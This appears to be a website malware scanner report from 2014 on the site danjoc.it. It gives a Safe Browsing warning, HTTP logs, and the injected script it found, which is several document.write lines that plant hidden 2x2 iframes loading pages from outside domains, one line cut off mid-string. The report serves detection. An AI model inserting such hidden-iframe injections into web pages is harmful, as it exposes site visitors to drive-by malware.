Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danjoc.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://danjoc.it/ | 200 OK Content-Length: 2034 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://painting-games.org/zahi.html?i=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://painting-games.org/zahi.html?i=1118878> | ||
http://danjoc.it/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 4155 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://venomprotein.com/mzzs.html?j=1118878></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://benwwh.com/zmcs.html?j=1118878></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1118878></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://babylonproduction.com/wmci.html?i=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://babylonproduction.com/wmci.html?i=1118878>
Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzws.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html>
Hidden iFrame found. size: 2x2 src: http://blog.fantasygifts.com/ozai.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j=1118878>
Hidden iFrame found. size: 2x2 src: http://venomprotein.com/mzzs.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://venomprotein.com/mzzs.html?j=1118878>
Hidden iFrame found. size: 2x2 src: http://benwwh.com/zmcs.html?j=1118878 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://benwwh.com/zmcs.html?j=1118878> | ||
http://villahome.eu/i.php | 500 Can't connect to villahome.eu:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
http://villahome.eu/test404page.js | 500 Can't connect to villahome.eu:80 (Bad hostname) Content-Length: 156 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danjoc.it
Result:
HTTP/1.1 200 OK
Date: Wed, 23 Apr 2014 17:08:21 GMT
Accept-Ranges: bytes
ETag: "22f755fb9c19ce1:0"
Server: Microsoft-IIS/8.5
Content-Length: 2034
Content-Type: text/html
Last-Modified: Tue, 05 Mar 2013 12:28:46 GMT
Set-Cookie: dadaproaffinity=4ba059caf398721a135b92f9f996b770f613f8caa36a6d05658c6ccba842bcab;Path=/;Domain=danjoc.it
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
...2034 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: danjoc.it
Referer: http://www.google.com/search?q=danjoc.it
Result:
The result is similar to the first query. There are no suspicious redirects found.